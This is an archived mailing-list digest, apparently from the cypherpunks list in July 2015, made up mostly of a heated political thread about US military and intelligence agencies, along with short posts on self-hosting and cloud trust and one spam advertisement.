<55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> <55add913.121c8d0a.89df3.1748@mx.google.com> <55ADF184.9070004@lig.net> <55AE10C2.6050501@pilobilus.net> Message-ID: <20150721144600.57358C00023@frontend1.nyi.internal> On July 21, 2015 2:35:23 AM Steve Kinney wrote a post that deserves to be QFT, so it's included below: Echoing Seth's sentiment, but wanted to be sure your post was read by anyone who might have missed it. I truly don't have the time right now to pen the kind of response I wanted to after reading those state apologist diatribes. Upon reading your reply below, I see you have it covered (and you made your point without the salty language I may have used. Heh.) +1, +1, +1... -Shelley > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > On 07/21/2015 03:15 AM, Stephen D. Williams wrote: > > On 7/20/15 10:32 PM, Juan wrote: > >> On Mon, 20 Jul 2015 21:36:57 -0700 "Stephen D. Williams" > >> wrote: > > [...] > > >> Are you saying the pentagon is good and useful? > > > > The Pentagon et al are protecting a large portion of the world > > from being overrun. Nobody else will do it. > > And all along I thought, the sooner the Pentagon et al stood down > and let the world be overrun, the better for the human race. > Better in every measurable way, except for the net worth and > sovereign power of the wealthy and powerful gangs that sponsor and > direct those organizations. > > >> Politicians are morally responsible. The military are > >> morally and materially responsible. > > > > Are police always bad too? > > Last I heard, police forces were not dispatched to cross borders > and kill large numbers of people, to advance the financial agendas > of some few thousands of the folks back home. When the police do > what the military does, they become criminals even by the > definition of the laws enacted by their own masters. > > Anyone who deliberately and for personal gain participates in mass > murder might be considered "bad." I prefer to think of them as > ignorant and disinformed, aside from a minority among them who are > psychopathic and in need of minders. > > >> ... Is everyone from the CIA scumbags by definition? Yes. > > > > Whatever you gotta believe. Most of their job is to understand > > the world, publishing both a nice public database and the > > presidential daily brief (today's news). And to consult with > > the President as need so that hopefully reasonably intelligent > > decisions are made, but that depends on the intelligence of the > > current president. > > So... If I understand this correctly, the CIA, a clandestine U.S. > military service, is in the business of persuading Presidents, > elected to embody the will of the People, to their way of > thinking. Come to think of it, their charter implicity says so. > I guess we should have dumped them when we had the chance. IIRC a > President once said he was going do just that, too bad somebody > shot him. > > Every corporate entity needs intelligence to function. How many > need a department to promote, codify and implement torture as a > psychological weapon? How many need a department that arms, > trains and directs gangs of killers to put inconvenient market > competitors out of business, and take over their shops? How many > need a department to set up and run major drug smuggling > operations, to fund other violent criminal enterprises off the books > ? > > I try not to go around calling people "scumbags" and come to think > of it, I succeed. But there's no denying that working for the CIA > in any capacity imparts a certain taint, given that it has been a > criminal enterprise more or less since its inception and shows no > signs of meaningful reform. By "criminal" I mean, per any common > sense definition that does not duck the issue by asserting that > certain functions of State are by definition "above the law" due > to some existential necessity. A MAFIA bookkeeper who always does > an honest day's work and never hurts anybody is not a criminal, righ > t? > > >>> What's your alternative to all of these things? If you > >>> really are into security in any sense, you should be able > >>> to explain what security exposures moderating or > >>> eliminating those entities would cause and what you would > >>> advocate to replace them. > >> Are you talking about the US military? > > And FBI, CIA, State, Google, etc. > > Practical alternatives to endemic, high dollar institutional > violence are limited by the inherent nature of the institutions > that carry it out: They exist to impose the will of their masters > on whole societies. They defeat their masters' specified enemies > by any means necessary, which covers a spectrum from propaganda > through deception, bribery and terrorism to the industrialized > mass murder we call warfare. Try to stop them; if you show signs > of success, their masters will direct them to neutralize YOU by > any means necessary. > > As things stand, we don't have enough volunteers to shut down the > killing machine by direct intervention. If and when we do, the > emergent organizations that make it possible will also play key > roles in developing long term solutions for international conflicts. > > As a practical matter, one must do what one can to stop the > bleeding; such efforts tend to be contagious, and we have ways of > spreading that contagion. It starts with telling the truth. > Opportunities to do that keep coming faster and faster. > > >>> I'm offended in various ways by a lot of what happened in > >>> the past, often in organizations like DOJ, FBI, etc. that > >>> should have known better. > >> Should they? Looks like you don't know what government is. > > Wha? > > Most people don't know what government is, because those who > govern use a very different definition than the ones the governed > are taught: State sovereignty is the power to rob, kidnap and > kill withing a given territorial boundary, and to defend these > powers as one's exclusive prerogative. > > Anarchists are consistently depicted as violent lunatics opposed > to any form of social order. The idea that government is based on > the consent of the governed is all well and good in a civics > class, but God forbid someone should try to actually implement > that fine theory by withdrawing their consent from particular > incarnations and/or functions of government. > > >> Worthless murdering scumbags are 'respectable' people and > >> not 'fundamentally evil'. Sure. Maybe they are > >> 'accidentally' evil? > > > > DOJ, Treasury, State, HHS, etc. are filled with worthless > > murdering scumbags? > > I would not say so, but broadly speaking, they are directed by > political appointees who, to varying extents, run them as criminal > enterprises. Criminal, even by the very liberal and tolerant > standards set by the State that employs them. > > > There are certain people, Marines et al, who are trained to be > > very lethal. Sucks to need that, but being anything less than > > the strongest & baddest isn't an option for the US. They are > > concentrated, supposed to be carefully deployed and directed. > > Create people like that from the subset of people who want to > > be like that and a few are going to go off the rails > > occasionally. That's a bummer, and needs to be constantly > > protected against, but there's no obvious alternative. > > To me, the alternatives are painfully obvious. Step one in a real > "war against terror" is to stop doing terrorism. Step one in > defending a country's "way of life" is to invest in its human and > industrial infrastructure. It certainly makes no sense to indulge > in multi-trillion dollar tax and debt funded economic bonfires > that produce nothing but paychecks, stock dividends and the odd > few million dead bodies and refugees here and there. > > > The US is the least imperialist top superpower that ever > > existed. Still not perfect, but better than all the rest. > > That's kind of like advertising oneself as the kindest, most > considerate serial killer presently at large. > > It doesn't take a lifetime of study or exceptional brain power to > recognize gross offenses to the values that define human beings as > social animals fit to walk the Earth. It does take a lifetime of > study and exceptional brain power, on the part of a whole > managerial class, to direct that society to commit such offenses > and take them for granted as regrettable necessities. > > The survival value of human intelligence has not been > satisfactorily demonstrated. Its hazards are becoming more > obvious every day. > > :o/ > > -----END PGP SIGNATURE----- From zen at freedbms.net Tue Jul 21 01:17:26 2015 From: zen at freedbms.net (Zenaan Harkness) Date: Tue, 21 Jul 2015 08:17:26 +0000 Subject: an ominous comment In-Reply-To: <55adc555.0ae88c0a.425f.3132@mx.google.com> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> Message-ID: On 7/21/15, Juan wrote: > Hey. *Now* I get it. > > This mailing list has a lot of tor-tards who are apologists of > the pentagon's propaganda and spying efforts. > > It has people who say that the NSA does good things (coderman) > > It has apologists of the US marines. > > It has high ranking scumbags from the CIA. > > It has commie 'anarchists' who are offended by (and would love > to silence) people who badmouth the marines' apologists. > > And NOW it also has a google and cloud apologist. Welcome > Stephen =) You are yet another reason to distrust the FLOSS movement and > its bloatware. Lemme guess - you're new here? Welcome :) From zen at freedbms.net Tue Jul 21 01:23:20 2015 From: zen at freedbms.net (Zenaan Harkness) Date: Tue, 21 Jul 2015 08:23:20 +0000 Subject: an ominous comment In-Reply-To: <55ADCC69.1060207@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> Message-ID: On 7/21/15, Stephen D. Williams wrote: > On 7/20/15 9:07 PM, Juan wrote: >> And NOW it also has a google and cloud apologist. Welcome >> Stephen =) You are yet another reason to distrust the FLOSS movement and >> its bloatware. > > FLOSS has bloatware? Nah - firefox is a lithe little vegetarian pea pod, lucky to use 1% of one CPU and a bee's proverbial of your RAM, LibreOffice is so small and feature free it's lucky to even print a document, and the Linux kernel, well, it's so clean, small and well documented it's just a few lines longer than HelloWorld.c - so of course it's well audited and highly secure as a result. Couldn't ask for cleaner security really. Nope, no bloatware round these parts. Someone missed the memo... From zen at freedbms.net Tue Jul 21 01:39:20 2015 From: zen at freedbms.net (Zenaan Harkness) Date: Tue, 21 Jul 2015 08:39:20 +0000 Subject: an ominous comment In-Reply-To: <55ADCC69.1060207@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> Message-ID: On 7/21/15, Stephen D. Williams wrote: ... > I'm offended in various ways by a lot of what happened in the past, > often in organizations like DOJ, FBI, etc. that should have > known better. Tut, tut! They should have indeed. > I would even say that a lot of government employees and > contractors seem to have got away with a lot of things they > shouldn't have. Naughty, naughty I tell you! Naughty little boys and girls. > But that doesn't mean that any of those organizations are > fundamentally evil and aren't almost completely staffed > by intelligent, respectable people. Wonderful! There's hope! U S A, U S A! So those intelligent CIA guys will stop toppling regimes by murder and plunder, to keep the US$ afloat and to keep trying for their one world f-ing government, and those respectable NSA guys will use their phone tapping of France, Germany, UK, Australia and every other nations politicians to create a safer, cleaner, more caring world, with regional sovereignty respected, the will of the people upheld, and a fundamentally fairer wealth system throughout the world! Hallelujah brother's and sisters, Amerika vilt save youse all. Now bend over and think of something pleasant. > Anyway, if you're still in the rebelling against authority stage, fine, have > fun. Good luck with that. In the US, government wise, > the people are the authority, Damn, how many of us wish that were true. Being the authority in principle, is so vastly different to living that authority. We saw all that gun-ho hoo hah go right out the window when the US Marshalls roamed the streets and confiscated by force of armed guard requests, many (most?) of the guns in the area. http://www.infowars.com/nra-the-untold-story-of-gun-confiscation-after-katrina/ > their own authority in essence, it just may Ahh yes, that's more like it, just an essence of authority, a remnant, not much actual authority in the people. Sadly. So very very sadly. We can only hope that people will wake up and start living their rights. > take a long time for that to play out in a given area. In By the time people wake up, it's usually too late. Pol Pot's people never woke up and when asked why he caused the massacre of much of his nation, he answered "it was an experiment", AIUI to see what people would do in the face of such evil. > some ways, this is also true for companies, with some nuance. Man that's some good weed you're smokin, don't be so greedy and pass it around bro! From zen at freedbms.net Tue Jul 21 02:03:27 2015 From: zen at freedbms.net (Zenaan Harkness) Date: Tue, 21 Jul 2015 09:03:27 +0000 Subject: an ominous comment In-Reply-To: <55ADF184.9070004@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> <55add913.121c8d0a.89df3.1748@mx.google.com> <55ADF184.9070004@lig.net> Message-ID: On 7/21/15, Stephen D. Williams wrote: > On 7/20/15 10:32 PM, Juan wrote: >> On Mon, 20 Jul 2015 21:36:57 -0700 >> "Stephen D. Williams" wrote: >> >>> On 7/20/15 9:07 PM, Juan wrote: >>>> Hey. *Now* I get it. >>>> >>>> This mailing list has a lot of tor-tards who are apologists >>>> of the pentagon's propaganda and spying efforts. >>> Are you saying that the Pentagon is never good or useful? Nor are >>> any of their spying efforts? >> Are you saying the pentagon is good and useful? > > The Pentagon et al are protecting a large portion of the world from being > overrun. Nobody else will do it. Damn! From Russia and China yeah? Wow. What a mindset. https://en.wikipedia.org/wiki/Covert_United_States_foreign_regime_change_actions "The United States has been involved in and assisted in the overthrow of foreign governments (more recently termed "regime change") without the overt use of U.S. military force. Often, such operations are tasked to the Central Intelligence Agency (CIA)." I grant they seem to be doing ... something. Here's the table of contents from that wiki page: Contents 1 Cold War 1.1 Syria 1949 1.2 Iran 1953 1.3 Guatemala 1954 1.4 Tibet 1955–70s 1.5 Indonesia 1958 1.6 Cuba 1959 1.7 Iraq 1960–63 1.8 Democratic Republic of the Congo 1960–65 1.9 Dominican Republic 1961 1.10 South Vietnam 1963 1.11 Brazil 1964 1.12 Chile 1970–73 1.13 Afghanistan 1979–89 1.14 Turkey 1980 1.15 Poland 1980–89 1.16 Nicaragua 1981–90 1.16.1 Destablization through CIA assets 1.16.2 Arming the Contras 2 Post–Cold War 2.1 Iraq 1992–96 2.2 Venezuela 2002 2.3 Iran 2005–present Perhaps those are the countries that were going to overrun "us" (never mind the fact I live in Australia anyway, but damn, what a way of thinking). SDW, thank you for being so frank - honest about how you think. It is educational to me in a good way. Part of the difference is perhaps that I am not living in the USA, so I look inwards to your government and agencies, not outwards. >>> when they don't determine their goals or rules of >>> engagement? Their job is to be a bad ass tool, the proverbial big >>> stick. It is someone else's job to decide how to use that tool. >>> Marines don't kill people, politicians using Marines kill people. >>> Err, something like that. >> >> Marines and other 'military personnel' murder people when >> 'ordered' to. They are the worst scumbags on earth. >> >> Politicians are morally responsible. The military are morally >> and materially responsible. > > Are police always bad too? > >> ... >> Is everyone from the CIA scumbags by definition? >> Yes. > > Whatever you gotta believe. > Most of their job is to understand the world, :) Interesting way of "understanding" the world - 'regime change' is about as polite a way the current empire can couch its predominant activity since WWII. > publishing both a nice public database and the > presidential daily brief (today's news). And to consult with the President > as need so that hopefully reasonably intelligent > decisions are made, but that depends on the intelligence of the current > president. Sounds like you're focusing on the small stuff, the little "local" political show. And a show it is, and apparently quite effective... >>> What's your alternative to all of these things? If you really are >>> into security in any sense, you should be able to explain what >>> security exposures moderating or eliminating those entities would >>> cause and what you would advocate to replace them. >> >> Are you talking about the US military? > And FBI, CIA, State, Google, etc. >> >> >> >>> I'm offended in various ways by a lot of what happened in the past, >>> often in organizations like DOJ, FBI, etc. that should have known >>> better. >> Should they? Looks like you don't know what government is. > Wha? >> >> >> >>> I would even say that a lot of government employees and >>> contractors seem to have got away with a lot of things they shouldn't >>> have. But that doesn't mean that any of those organizations are >>> fundamentally evil and aren't almost completely staffed by >>> intelligent, respectable people. >> >> LOL. So, how much trolling should I let you get away with? >> >> Worthless murdering scumbags are 'respectable' people and not >> 'fundamentally evil'. Sure. Maybe they are 'accidentally' >> evil? > > DOJ, Treasury, State, HHS, etc. are filled with worthless murdering > scumbags? Time to wake up. You evidently need to do more research. The balance of good vs. evil, of the once mighty USA, is well and truly tipped in favour of despotism and cronyism at this point in history. Very unfortunately. And notwithstanding the good remnant who do remain actually within the system (as insignificant and ineffective as they are to effecting good into the world). Greece. Rome. Persia. British Empire. USA. Every empire falls. USA has fallen, it just can't quite see the reality of this yet. > There are certain people, Marines et al, who are trained to be very lethal. > Sucks to need that, but being anything less than the > strongest & baddest isn't an option for the US. They are concentrated, > supposed to be carefully deployed and directed. Create > people like that from the subset of people who want to be like that and a > few are going to go off the rails occasionally. That's a > bummer, and needs to be constantly protected against, but there's no obvious > alternative. > > The US is the least imperialist top superpower that ever existed. Still not > perfect, but better than all the rest. "No better than all the rest". Fixed that for you. The record is abysmal. USA is "morally" (on an international political and death-toll level) and financially bankrupt. I just pray that the end of USA's grab for global hegemony means a long lasting multi-polar world, and not a new imperialist Chinese "empire regime". >> How about they 'accidentally' beat you to a pulp and then feed >> you to the pigs? Just as an innocent mistake of course... > > Oh kay. Are you off your meds? You're missing the point. "Regime change" means if you're in their way, your life ends. Time for you to do some history lessons. Because you feel safe (you're one of the "good guys" right?), you don't see the problem, and you therefore have difficulty hearing the message. >>> Anyway, if you're still in the rebelling against authority stage, >>> fine, have fun. Good luck with that. In the US, government wise, >>> the people are the authority >> Really? That's an interesting concept. How many lsd doses do >> you need in order to reach the parallel universe where that >> is reality? Because in this universe, it isn't. > > You haven't been watching long or closely enough. Things have changed > a lot in the US in my lifetime, and it's only speeding up. Sadly, individual liberty was not respected enough to capture the sanction of foreign thinkers. I'm being extraordinarily conservative in my words here... >>> , their own authority in essence, it just >>> may take a long time for that to play out in a given area. >> Sure. That's how jesus planned it all. > > Nonsense again. > >> >>> In some >>> ways, this is also true for companies, with some nuance. >>> >>> sdw >>> > > sdw From oshwm at openmailbox.org Tue Jul 21 01:32:19 2015 From: oshwm at openmailbox.org (oshwm) Date: Tue, 21 Jul 2015 09:32:19 +0100 Subject: an ominous comment In-Reply-To: References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> Message-ID: <6026027D-4A9F-4D2E-A17A-6BD7C6F99B55@openmailbox.org> You lot sound like the types that'd run openbsd on your desktops :D From odinn.cyberguerrilla at riseup.net Tue Jul 21 09:32:24 2015 From: odinn.cyberguerrilla at riseup.net (odinn) Date: Tue, 21 Jul 2015 09:32:24 -0700 Subject: Encryption Rights - A Google+ community In-Reply-To: References: <179659091.PKgjI4HLZx@lapuntu> <1967648.u6W7a8k46C@lapuntu> Message-ID: <55AE7418.5090806@riseup.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 That's pretty cool, the indiehosters.net thing which I hadn't seen until now, looks like people might consider hopping onto it to divest somewhat from Google / facebook business models. On 07/21/2015 07:14 AM, Seth wrote: > On Sat, 18 Jul 2015 14:09:21 -0700, rysiek > wrote: >> Run your own servers, control your own infrastructure. There are >> ways to do it. Next on my "ToTest" list is this, for instance: >> https://github.com/sovereign/sovereign > > Funny you mention the Sovereign project, I stumbled upon it myself > for the first time last week. > > I had already been in the process of building my own version of > essentially the same thing, only geared more towards Parabola > GNU/Linux and Open/FreeBSD. > > Another interesting project for wresting back control of your data > and services is indiehosters [1][2] > > Probably a better option for those without copious amounts of free > time and the technical skills and desire to implement a DIY > solution. > > [1] http://www.wired.com/2014/11/indie-hosters/ [2] > https://indiehosters.net/ > - -- http://abis.io ~ "a protocol concept to enable decentralization and expansion of a giving economy, and a new social good" https://keybase.io/odinn -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQEcBAEBAgAGBQJVrnQXAAoJEGxwq/inSG8CmKEIALR7rppdBNubhMTNGJcPQ1be 4O+NSzCC3h/lAIfdqymOOLmuaEqTigIfFU+8wpbwyKGeg/q/6uCi21hOSgEyb6XW 0ijJG05xEimM1peHk7REndCIzgOG2+JvE4r4I4tOdy1MHyJwxQQq9MK/bN59Seto wVVbtojLrBJ64cTb9rz2Ctgt6cILY1drKU6qP8kftKf8vLOggHyrjetlNXfPnVci pAAU40tlgexDGwtPlwrShAdGcDNcHnwK8rK4VwfC1msem7SIHXj/CfuqBr4wc3+0 qeYB7piBpDn6dgCjNffaETWhpo/XXewccAOfksp2Izu9dpagwFYxYCCN7s2pGoE= =EJks -----END PGP SIGNATURE----- From nickeconopouly at gmail.com Tue Jul 21 06:53:11 2015 From: nickeconopouly at gmail.com (Nick Econopouly) Date: Tue, 21 Jul 2015 09:53:11 -0400 Subject: an ominous comment In-Reply-To: <55adc555.0ae88c0a.425f.3132@mx.google.com> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> Message-ID: <20150721135311.GA9266@android> On 07/21, Juan wrote: > > > Hey. *Now* I get it. > > This mailing list has a lot of tor-tards who are apologists of > the pentagon's propaganda and spying efforts. > > It has people who say that the NSA does good things (coderman) It is child's thinking to think that the NSA only does bad things. You can think of the Govt. as fundamentally bad or evil or whatever but it simply isn't logical for it to never, say, thwart a legitimate attack (no "t" word, you're welcome) that it didn't cause. the propaganda you mention wouldn't work if people, including those working for the govt., thought that the govt. wasn't working to solve the problem. The govt HAS to do good things to retain its legitimacy in enough of its peoples' eyes. The US government does not keep its power over its citizens with just brute force and propaganda. It is a complex social relationship, and yes a great deal of propaganda is involved. But it is not totalitarian the way you frame it. It is not like a children's movie where the villians are all ugly and you can tell they are villians just from the way they look and talk. The policeman, the marine dude, and even the politician or CIA official came from some family and applied for the job because it was considered an acceptable way to make a living and contribute to society. They are not all evil. It doesn't matter if the nasty recipe of them all mixed together makes the USA cause/commit atrocities, it's simplistic and basically false to act like every one of these USians is evil. By killing these kinds of discussions with your delusional, short-man-syndrome arguments, you are contributing to the problem. Think of the disgruntled senator or NSA worker who is reading this list, and finds they agree with our stuff. now, instead of being fascinated by some of the other posts that were actually about cryptography, like decentralized social nets, etc, they are clicking away because of your trolling. Actually, to be honest, you are serving the NSA more than anyone on this list, even the "spies". When it has been deserted because it resembles the comments section of a youtube video, they will have you to thank. Also, you guys really think there is an NSA-man personally reading this list, looking for dissedents? Why would they waste their time on this shit? The only ones subverting it are the most hardcore cypherpunks here, who act like pretty much every free cryptography program is US propaganda somehow. If juan is an agent, he is doing his job very well. Many people in the govt. think they are doing good, and to be honest a good deal of them are. This coming from someone who thinks healthy society could exist without a government. Citizens think the government is on their side too, and it's not that they are simply brainwashed. There are no mandatory telivision hours where you have to watch govt propaganda, the two main sources of it are in the msm (TV), and at school while the child grows up. It isn't north korea, or 1984.The citizens don't feel forced, most of them, and it's because the government has this habit of NOT being an evil, creepy death cult most of the time. The bad stuff happens away from the public view including the stuff y'all have mentioned like the CIA mercenary armies and fiddling with regimes after WWII. > > It has apologists of the US marines. > > It has high ranking scumbags from the CIA. > > It has commie 'anarchists' who are offended by (and would love > to silence) people who badmouth the marines' apologists. False. I wouldn't have interjected because then I am contributing to the problems of this mailing list, but don't keep telling fabrications about me please. Literally every statement in that sentance is a lie about me. Not cool. > > And NOW it also has a google and cloud apologist. Welcome > Stephen =) You are yet another reason to distrust the FLOSS movement and > its bloatware. It's amusing how Juan picked up the "apologist" term from my emails and is now using it incorrectly. -nick From interviewershop211 at texasmedicaldoctor.com Tue Jul 21 09:38:37 2015 From: interviewershop211 at texasmedicaldoctor.com (Ellen Dobson) Date: Tue, 21 Jul 2015 12:38:37 -0400 Subject: Price for Viagra (Sildenafil) 100mg x 30 pills $99.95 Message-ID: <000d01d0c3d3$b1594dc0$6400a8c0@interviewershop211> US $ 129.95 Price for 100mg x 60 pills http://superstarsfree.com.es From softservant at gmail.com Tue Jul 21 13:05:40 2015 From: softservant at gmail.com (Softy) Date: Tue, 21 Jul 2015 13:05:40 -0700 Subject: =?UTF-8?Q?Re=3A_=E2=80=8Ban_ominous_comment?= Message-ID: ​And, let's not forget that as DARPA funded Google then to did Google and NASA fund Singularity Univ. So, perhaps you say Google and the IC/DoD are world dominators. Perhaps these machinations of the elite are to usher in a super human intelligence (hopefully controlled by DoD) for their own service. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1064 bytes Desc: not available URL: From loki at obscura.com Tue Jul 21 13:54:25 2015 From: loki at obscura.com (Lance Cottrell) Date: Tue, 21 Jul 2015 13:54:25 -0700 Subject: an ominous comment In-Reply-To: <55ae9473.d8ea8c0a.b49bb.ffff9972@mx.google.com> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> <55add913.121c8d0a.89df3.1748@mx.google.com> <55ADF184.9070004@lig.net> <55AE10C2.6050501@pilobilus.net> <55ae9473.d8ea8c0a.b49bb.ffff9972@mx.google.com> Message-ID: <51A031B8-7E9C-4D04-8ADF-6DDDE1F39296@obscura.com> I recall it being more nuanced and diverse. -- Lance Cottrell Sent from my iPad > On Jul 21, 2015, at 11:51 AM, Juan wrote: > > On Tue, 21 Jul 2015 06:58:52 -0700 > Seth wrote: > >> Correct me if I'm wrong, but aren't the roots of the Cypherpunk >> movement more or less explicitly anarchist? > > this ^^^^^ > >> >> The number of state-theists on this list never ceases to amaze. > > and this ^^^^^ -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/pkcs7-signature Size: 2318 bytes Desc: not available URL: From dan at geer.org Tue Jul 21 11:01:05 2015 From: dan at geer.org (dan at geer.org) Date: Tue, 21 Jul 2015 14:01:05 -0400 Subject: an ominous comment In-Reply-To: Your message of "Mon, 20 Jul 2015 09:36:05 +0200." <55ACA4E5.5010807@artdecode.de> Message-ID: <20150721180105.491862280EA@palinka.tinho.net> Continuing to think about this, an analogy presents itself. If I tell you a secret after getting your agreement that you will not yourself tell anyone else, then I am trusting in non-recursive disclosure, i.e., you break the chain and I trust that you will not fail to do so. If I place my execution or my storage in the hands of others, then I am trusting in non-recursive propagation of my code and/or my data. If the pinnacle goal of security engineering is "No silent failure," then creating a dependence on non-recursive exposure of execution or storage is resolved either by blind trust or by a sufficient degree of surveillability that prevents silent breaking of the non-recursion constraint. But what would that be? Is this a kind of supply chain argument that devolves to whether a target is or is not big enough to sue? If I have proven, workable recourse, then perhaps I can trust -- which is to say I am able to then choose to take no additional, proactive countermeasures. If I do not have proven, workable recourse, then how can I prevent not just silent failure but silent failure plus a clean getaway even post-discovery? Daniel Solove suggested that the greatest danger to privacy is a blythe "I live a good life and have nothing to hide;" so, in parallel, is not the greatest danger to data integrity something of a parallel construction, something like "No one would want to screw with my cloud, I'm just a nobody"? Thinking out loud; no need to answer, --dan From sdw at lig.net Tue Jul 21 15:14:49 2015 From: sdw at lig.net (Stephen D. Williams) Date: Tue, 21 Jul 2015 15:14:49 -0700 Subject: an ominous comment In-Reply-To: <20150721180105.491862280EA@palinka.tinho.net> References: <20150721180105.491862280EA@palinka.tinho.net> Message-ID: <55AEC459.8000600@lig.net> On 7/21/15 11:01 AM, dan at geer.org wrote: > Continuing to think about this, an analogy presents itself. > If I tell you a secret after getting your agreement that you > will not yourself tell anyone else, then I am trusting in > non-recursive disclosure, i.e., you break the chain and I > trust that you will not fail to do so. > > If I place my execution or my storage in the hands of > others, then I am trusting in non-recursive propagation of > my code and/or my data. If the pinnacle goal of security > engineering is "No silent failure," then creating a > dependence on non-recursive exposure of execution or storage > is resolved either by blind trust or by a sufficient degree > of surveillability that prevents silent breaking of the > non-recursion constraint. But what would that be? Is this > a kind of supply chain argument that devolves to whether a > target is or is not big enough to sue? If I have proven, > workable recourse, then perhaps I can trust -- which is to > say I am able to then choose to take no additional, > proactive countermeasures. If I do not have proven, > workable recourse, then how can I prevent not just silent > failure but silent failure plus a clean getaway even > post-discovery? > > Daniel Solove suggested that the greatest danger to privacy > is a blythe "I live a good life and have nothing to hide;" > so, in parallel, is not the greatest danger to data > integrity something of a parallel construction, something > like "No one would want to screw with my cloud, I'm just a > nobody"? > > Thinking out loud; no need to answer, > > --dan +1 There are multiple avenues possible of assurance, architecture, audit, obfuscation, canaries, etc. Perhaps encrypted computing will be useful; already encrypted storage is relatively easy to use for at least some circumstances (object stores, backup). If billions of lightweight container-based compute transactions are flowing through a system that pools payment and has secure distributed storage and communication, is it possible to be too obscure to identify and tap? Spammer scammers are practicing this kind of thing daily, and countermeasures are being created too, but as for most of that there is a final traceable step, email etc., that's not quite the same as some other private security goals. sdw -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2776 bytes Desc: not available URL: From coderman at gmail.com Tue Jul 21 15:22:58 2015 From: coderman at gmail.com (coderman) Date: Tue, 21 Jul 2015 15:22:58 -0700 Subject: an ominous comment - duality of earth human existence Message-ID: On 7/20/15, Stephen D. Williams wrote: >> >> It has people who say that the NSA does good things (coderman) > > They don't? defensive mission vs. offensive like the duality of existence, good and bad, bad and good; polemic extremes always. gotta learn offensive to know how to defend. then defender uses to advance attacks? we're fighting this front in many contexts. all the easy lines are drawn, and the problems left hard to impossible. --- i don't know if you have good or bad intentions, Juan. but i hope you know what i like about NSA is their defensive support, and i miss the days when they weren't raving drunk with offensive addiction pointed domestically... [ and funny enough, their offensive addiction led to leaks which led to mass adoption of crypto in ways i never imagined could happen. so might even say a BAD NSA is good for privacy. ] --- best regards and intentions, even to Juan ;P From juan.g71 at gmail.com Tue Jul 21 11:51:45 2015 From: juan.g71 at gmail.com (Juan) Date: Tue, 21 Jul 2015 15:51:45 -0300 Subject: an ominous comment In-Reply-To: References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> <55add913.121c8d0a.89df3.1748@mx.google.com> <55ADF184.9070004@lig.net> <55AE10C2.6050501@pilobilus.net> Message-ID: <55ae9473.d8ea8c0a.b49bb.ffff9972@mx.google.com> On Tue, 21 Jul 2015 06:58:52 -0700 Seth wrote: > Correct me if I'm wrong, but aren't the roots of the Cypherpunk > movement more or less explicitly anarchist? this ^^^^^ > > The number of state-theists on this list never ceases to amaze. and this ^^^^^ From sdw at lig.net Tue Jul 21 16:30:44 2015 From: sdw at lig.net (Stephen D. Williams) Date: Tue, 21 Jul 2015 16:30:44 -0700 Subject: an ominous comment In-Reply-To: References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> 